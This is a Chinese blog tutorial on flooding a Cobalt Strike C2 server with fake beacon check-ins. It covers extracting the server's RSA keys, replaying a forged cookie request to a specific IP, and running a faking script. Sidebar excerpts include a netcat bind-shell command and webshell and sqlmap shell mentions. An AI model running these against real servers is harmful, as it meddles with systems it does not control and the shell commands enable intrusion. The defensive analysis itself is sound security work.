CS反制之批量伪装上线

最新推荐文章于 2023-02-19 15:03:06 发布
最新推荐文章于 2023-02-19 15:03:06 发布
阅读量720 收藏
点赞数
分类专栏: 后渗透 工具 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/128963170
版权

分析原理:
我们利用Wireshark抓包工具分析一下Cobalt Strike的上线过程是怎么样的
在这里插入图片描述
点击木马,主机上线并抓包
在这里插入图片描述
查看数据包
在这里插入图片描述
在这里插入图片描述
可以看到cookie是一串非对称RSA加密类型,需要一个私钥Private Key才能对其进行解密
我们对Cookie解密看看,网上找到了相关的代码提取Private Key与Public Key
(注意,实战中我们肯定拿不到Private Key的,这里只是弄出来分析一下加密的Cookie里有啥)
代码如下:
DumpKeys.java:

import java.io.File;
import java.util.Base64;
import common.CommonUtils;
import java.security.KeyPair;

class DumpKeys
{   
    public static void main(String[] args)
    {
        try {
            File file = new File(".cobaltstrike.beacon_keys");
            if (file.exists()) {
                KeyPair keyPair = (KeyPair)CommonUtils.readObject(file, null);
                System.out.printf("Private Key: %s\n\n", new String(Base64.getEncoder().encode(keyPair.getPrivate().getEncoded())));
                System.out.printf("Public Key: %s\n\n", new String(Base64.getEncoder().encode(keyPair.getPublic().getEncoded())));
            }
            else {
                System.out.println("Could not find .cobaltstrike.beacon_keys file");
            }
        }
        catch (Exception exception) {
           System.out.println("Could not read asymmetric keys");
        }
    }
}

有一个坑点:
代码注意要在JDK11版本下运行。还要把这个java文件放置在CS服务器的CS文件夹下,与“cobaltstrike.jar“同一个目录下。
命令:

java -cp cobaltstrike.jar DumpKeys.java

在这里插入图片描述
用rsa网站解密https://the-x.cn/cryptography/Rsa.aspx

在这里插入图片描述
可以看到解密出的数据有我们的元数据,HTTP类型Beacon上线包里的Cookie是RSA加密过的主机元数据
既然知道上线的流量过程,那么我们模拟Cobalt Strike模拟重放一下上线的过程
写类似爬虫请求:

import requests

url = "http://185.239.225.205:83/en_US/all.js"

header = {
    "User-Agent" : "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)",
    "Accept" : "*/*",
    "Cookie" : "FRfwPoK21T48W80c9VZm8C0vw1116g/X6T4nxjYGNqQJquF9Z7M2AS2QDP6yHz+ca7rOpxi0f/fnitfMLVfy/wOwMrHDZdsxpAp2j77425op8AV9DCNYftCVowPrBtSaN4d6q3LBkXXcAbYcD9k/NDRIXB/TrWHu015XmrCibnA=",
    "Connection" : "Keep-Alive",
    "Cache-Control" : "Cache-Control"
}

r = requests.get(url,headers=header);
print(r.url)
print(r.text)
print(r.headers)
print(r.status_code)

在这里插入图片描述
在这里插入图片描述
可以看到时间为1s,跟之前的43s比,这是最新的请求,如下:
在这里插入图片描述
数据包中的核心是加密后的Cookie,我们进行伪造,达到假的主机上线效果
Stager Url校验算法Beacon配置的解密算法
其实Stager就是小马拉大马的操作,上线的时候先投递一个小巧的Stager Payload,然后通过Stager 去Beacon Staging Server的某个URL下载完整的Stage(也就是体积更大功能更复杂的Payload),并将其注入内存。
(这个URL作为特征也可以用来识别CS服务器,做网络测绘,某Quake就是这么做的)
如何得到那个URL?
CS中Stager URL校验算法,就是生成4位的随机校验码,将校验码拼接到URL后面即可请求到Stage的代码
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
拿到Stage

Beacon配置解密
这里进行解密操作:
https://github.com/Sentinel-One/CobaltStrikeParser

在这里插入图片描述

解密后可以看到:公钥PublicKey以及CS服务器地址
坑点:
Public key别忘了要删点后面的无效Padding正确的格式是MIGfXXXXXXXXXXXXXXXX==也就是说我图中的Public Key 后面那一堆AAAAA要删掉

这里直接使用脚本来解密beacon的publickey
脚本链接:https://github.com/LiAoRJ/CS_fakesubmit
命令:

python3 cs_fakesubmit.py

使用方法:
在这里插入图片描述
脚本效果如下:
在这里插入图片描述

可以看到成功伪造上线,对攻击者造成大量混乱
在这里插入图片描述

这是50次的效果

番茄酱料
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cs上线fake_online
01-15
cs上线fake_online
CS反制-CS服务器新特征
Gamma_lab的博客
03-12 4458
CobaltStrike是一款基于Java编写的全平台多方协同后渗透攻击框架,几乎覆盖了APT攻击链中所需要用到的各个技术环节。 基本描述 CobaltStrike的HTTP(S)监听器对请求URL未进行"/"开头验证,攻击者可通过指定URL获取相关信息。 有效载荷 GET stager HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 测试过程 影响范围 CobaltStrike <= 4.5 该特征已申请了CVE! 最后 HW临近,公众
如何利用CobalStrike进行批量上线
Ms08067安全实验室
01-06 609
点击上方蓝字关注我哦出品|MS08067实验室本文作者:BlackCat(Ms08067内网安全小组成员)BlackCat微信(欢迎骚扰交流):前言:当获取一台目标服务器权限时,更多是想...
反制burpsuit RCE上线CS
qq_40773698的博客
05-11 1132
0x00前言: Burp Suite的反制原理是利用低版本的chrome浏览器漏洞来触发命令执行达到反制的效果,Headless Chrome是谷歌Chrome浏览器的无界面模式,通过命令行方式打开网页并渲染,常用于自动化测试、网站爬虫、网站截图、XSS检测等场景。攻击者可以利用这些缺陷攻击客户端应用以达到命令执行效果。 0x01触发条件: Burp Suite v2.0的Live audit from Proxy被动扫描功能在默认情况下开启JavaScript分析引擎(JavaScr
朔源反制cs流量分析
wuqingsix的博客
02-19 1131
弱特征:url headers format 这些需要自己更改配置文件在控制端temview的时候配置文件profile参数。强特征:TCP数据包中含有ja3,ja3s中的值为强特征 C hello S hello。wireshrk 筛选出符合本机通信与木马通信端的TLSv1的协议。进行wireshrk抓包筛选http 可获得一些cs独有的特征。测试http上线检测:eth0为监听的网卡 yaml为规则。强特征:请求含有checksum8规则的路径。基础特征:魔改的基本都会改。
DreamweaverCS网页制作完美版资料.ppt
11-14
DreamweaverCS网页制作完美版资料.ppt
如何制造CS1.5的机器人.mp4
02-13
如何制造CS1.5的机器人
FlashCS动画制作培训教程FlashCS入门完美版资料.ppt
11-14
FlashCS动画制作培训教程FlashCS入门完美版资料.ppt
DreamweaverCS网页制作实用教程第章综合实例完美版资料.ppt
11-14
DreamweaverCS网页制作实用教程第章综合实例完美版资料.ppt
DreamweaverCS网页制作实用教程第章DreamweaverCS的基本操作完美版资料.ppt
11-14
DreamweaverCS网页制作实用教程第章DreamweaverCS的基本操作完美版资料.ppt
对正在打野发育的红队同学的一次反制
Love&Share
12-08 1553
文章目录故事开始其他反制思路隐蔽C2CS重定向器实验 故事开始 真的是对同学的反制哈,我们最近都在学习内网&钓鱼就互相”攻击“,就有那么一天我就在想我偷懒把CS登录密码设置的很简单,会不会其它人也偷懒,于是就抱着尝试的心态把手伸向了”Jerry同学“,谁让她上次钓鱼来着,历历在目,我是链接 穷学生么,一般学习就拿自己的云服务器了,她的CS TeamServer肯定就搭建在服务器上了 尝试用自己的CS Client连接 主机就是她博客域名,啥用户名、端口就默认,估计也懒得改 接下来就是激动人心的.
CobalStrike批量上线后的权限维持和信息收集~
Ms08067安全实验室
01-11 823
出品|MS08067实验室本文作者:BlackCat(Ms08067内网安全小组成员)BlackCat微信(欢迎骚扰交流):前言:昨天做CS批量上线的时候发现,内网渗透的本质都是信息收集...
Certutil工具(Windows命令行下载常用)
热门推荐
bring_coco的博客
05-28 2万+
Certutil包含一个编码参数(编码)。这有助于在Base64中编码文件的内容。这是在Windows中等效于Linux中的base64命令。不能打开.exe可执行文件时候,可以使用certutil对可执行文件进行编码。然后传输编码后的数据,然后在接收机上对其进行解码。这里创建一个名为test.txt的文本文件,输入一些内容,打开powershell命令:Add-Content test.txt “ni hao”编码(base64)
冰蝎使用
bring_coco的博客
03-03 1万+
一.启动 Windows环境下: 1.配置环境:冰蝎只支持jre6-jre8 可以在电脑上查看java版本 命令:java -version 2.启动 在冰蝎目录下命令行输入 命令:java -jar Behinder_v3.0_Beta6_win.jar(这里文件名可简化) 即可开启 Linux环境下: 注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打开冰蝎目录输入命令 二.使用(在本机进行实测) 环境:phpStudy+冰蝎 通过启动phpStudy,访问本机地址 成功访
Sqlmap的getshell使用(--os-shell)
bring_coco的博客
03-16 8654
环境:sqli-lab靶场+phpstudy。
FOFA语法
bring_coco的博客
03-07 6473
1.title=”beijing” 从标题中搜索“北京” 2.header=”thinkphp” 从http响应头中搜索“thinkphp” 3.body=”管理后台” 从html正文中搜索“管理后台” 4.domain=”163.com” 从子域名中搜索带有“163.com”的网站 5.icon_hash=”-247388890” 搜索使用此icon的资产 6.host=”.gov.cn”
哥斯拉Webshell
bring_coco的博客
03-03 5389
一.启动 命令:java -jar Godzilla-V2.96.jar 启动时同目录会生成data.db数据库存放数据 启动成功界面如下 二.使用(在本机实测) 这里演示jsp文件进行连接(需要提前配置好jsp环境) 1.点击管理->生成 这里默认密码,密钥(也可以更改,只要跟连接时候保持一致即可) 接下来将生成的文件存放在Tomcat目录下,注意是在Tomcat–>webapps–>ROOT目录下 可以打开指定路径,此时生成的shell.jsp已经生成 接下来点击目标—&
使用burp生成CSRF的POC验证CSRF
bring_coco的博客
12-14 2798
实验环境:phpstudy, DVWA,burpsuite 演示过程: <1>使用burp代理提交内容 (代理推荐使用FoxyProxy小插件) <2>burp中寻找CSRF POC自动化生成选项 <3>可以看到如下为自动化生成POC 自动化编写有时候有些是不能用的,最好是自己改一些 <4>将HTML代码复制到新建的csrf.html中 <5>将其打开 <6>点击请求 可以看到成功改变密码。 这种方式虽然成功了,但是必须跟
内网中使用netcat进行正向和反向获取shell
bring_coco的博客
12-07 2666
本次演示在linux环境下 一般用外网机器对内网机器进行访问时,多用反向shell,内网机器与内网机器之间多用正向shell 正向shell 由于内网及其属于边界服务器,因此我们先进行正向shell演示(正向shell是在目标机器上进行监听): 内网机器上命令:nc -lvp 4444 -e /bin/sh 本地机器上命令:nc 10.0.78.41 4444 显示已经连接 进行验证: 说明正向连接成功 反向shell 反向shell是在本地vps上进行监听,目标机器进行连接 本地机器上命令:nc -l
cs上线ubuntu
最新发布
10-04
cs上线ubuntu系统的步骤如下: 1. 在Ubuntu系统中打开终端。 2. 使用命令git clone https://github.com/rxwx/CobaltStrike_C2_MacOS_Linux.git下载CobaltStrike_C2_MacOS_Linux项目。 3. 进入项目目录,使用命令./genCrossC2.MacOS Linux(如果是其他Linux系统,请根据实际情况进行修改)启动CrossC2服务端。 4. 使用命令./CrossC2-test cs服务器的ip 监听器端口启动CrossC2客户端。 5. 现在你的cs已经成功上线Ubuntu系统了。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值